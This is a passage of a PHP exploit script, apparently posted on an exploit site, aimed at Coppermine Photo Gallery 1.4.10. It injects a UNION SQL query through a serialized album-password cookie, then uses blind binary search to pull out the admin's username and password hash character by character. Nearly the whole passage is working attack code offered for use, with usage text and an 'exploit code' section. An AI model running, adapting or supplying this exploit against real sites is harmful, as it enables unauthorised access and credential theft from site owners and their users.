` [table prefix]\n"; print " - hostname\n"; print " - web dirname \n"; print " - force mode - '0' - for Off or \"album number\" for force mode On \n"; print " [table prefix] - prefix of sql tables\n"; print " example: " . $argv[0] . " coppermine.site photo/ 1 cpg1410\n"; credits(); } ############################################### /* FUNCTIONS */ ############################################## if (!function_exists(str_split)){ ### for PHP4 << FIX function str_split($str) { $str_array=array(); $len=strlen($str); for($i=0;$i<$len;$i++) $str_array[]=$str{$i}; return $str_array; } } function toSql($str){ $a_str = str_split ($str); $s_str = '0x'; foreach ($a_str as $val){ $s_str .= sprintf("%X",ord($val)); } return $s_str; } function toCookie ($str){ $str = "-1) UNION SELECT " .toSql ($str). ",1 as md5_password/*"; $c_str=array(0=>"8", $str=>"1"); $c_str = $GLOBALS['prefix'].'_albpw='.urlencode(serialize($c_str)).';'.$GLOBALS['cookies']; return $c_str; } function getAlbum($text){ if (preg_match("/(?<=album=)[1-9]{1}(?=\">)/", $text, $match)) { return intval($match[0]); } else return 0; } function getCookie($text){ if (preg_match_all("/(?<=Set-Cookie:)(.*)(?=expires)/", $text, $match)) {$cookie = $match[0][0].$match[0][1];} else {$cookie = '';} return $cookie; } function getPrefix($text){ if (preg_match("/(?<=\s)[a-z0-9_]*(?=_data)/", $text, $match)) return trim($match[0]); else return false; } function toPage($page){ $pattern = "/(?<=HTTP).*(?=>> vulnerable: CPG 1.4.10 stable <<< | +------------------------------------------+ '; } ##################################################################### ### HACK FUNCTIONS ##### #### ### what to find: ## user_name user_password FROM cpg1410_users WHERE user_id=1 #################################################################### function makeExpl($param, $cond, $sn) ### $param - name || password; $cond - condition (e.g. =97) ; $sn - position { global $argv; $tprefix = (isset($argv[4])) ? $argv[4] : 'cpg1410'; $query = 'ASCII(substr((SELECT user_'.$param.' FROM '.$tprefix.'_users WHERE user_id=1),'.$sn.',1))' . $cond; $sql = '0) UNION SELECT '.$GLOBALS['album'].' AND ' .$query. '/*'; //echo $sql; ###DEBUG return toCookie($sql); } ////////////// function blind($param, $sn, $fmin, $fmax) { if (($fmax-$fmin)<5) { return crack($param, $fmin, $fmax, $sn) ;} $compare = intval($fmin + ($fmax-$fmin)/2); $crcheck = ">". $compare; if ( check(makeExpl($param, $crcheck, $sn)) == 1 ) { return blind($param, $sn, $compare, $fmax); } else { return blind($param, $sn, $fmin, $compare+1); } } function crack($param, $cmin, $cmax, $sn) { for ($i=$cmin; $i <=$cmax; $i++){ $crcheck = '='.$i; $sqlCookie = makeExpl($param, $crcheck ,$sn); if (check($sqlCookie) == 1){print chr($i); return 1;} } return 0; } function check($sqlCookie){ global $page, $etalon; $testPage = toPage(sendit ($page, 'GET', $sqlCookie)); if ($testPage < $etalon) return 1; else return 0; } function exploit($param){ echo "\nLet's define admin's ". $param . "\n"; $min = 48; # 0 $max = 122; # z $sql_cookies = makeExpl($param,'BETWEEN '.$min . ' AND '.$max,1); if (check($sql_cookies) == 0) {echo 'failed...'; return;} $sn=1; while(blind($param,$sn, $min, $max) !== 0) { $sn++; if ($sn > 32) return; } } ############################################################### ## START E X P L O I T C O D E ############################################################# echo ' Exploiting: [+] target: '. $argv[1].'/'.$argv[2].' '; $page = ''; $firstReply = sendit($page, 'GET'); $album = getAlbum($firstReply); ### get valid album number if ($album == 0) { echo "[-] No valid album found...\n"; if ($argv[3] != 0) {echo "... Forcing\n"; $album = $argv[3];} ### FOR FORCE MODE!!!! If you know exactly album number - put it here else {credits();} } $page = 'thumbnails.php?album='.$album; $GLOBALS['album'] = $album; echo "[+] Valid album number: ".$album . "\n"; $GLOBALS['cookies'] = getCookie($firstReply); ### get cookie from host $prefix = getPrefix($GLOBALS['cookies']); ### get cookie prefix echo "[+] Cookie prefix: " . $prefix . "\n"; $GLOBALS['prefix']=$prefix; $etalon = toPage(sendit ($page, 'GET', $c_cookies)); ### number of images at etalon page $first_sql = '0) UNION SELECT '.$album.' AND 1=1/*'; ### FIRST sql query - let's make valid album to be invisible $first_cookie = toCookie($first_sql); if (check($first_cookie) == 0) {echo "exploit failed..."; credits();} ### if album is still visible - site is unvulnerable exploit('name'); exploit('password'); credits(); ?> `

Query Builder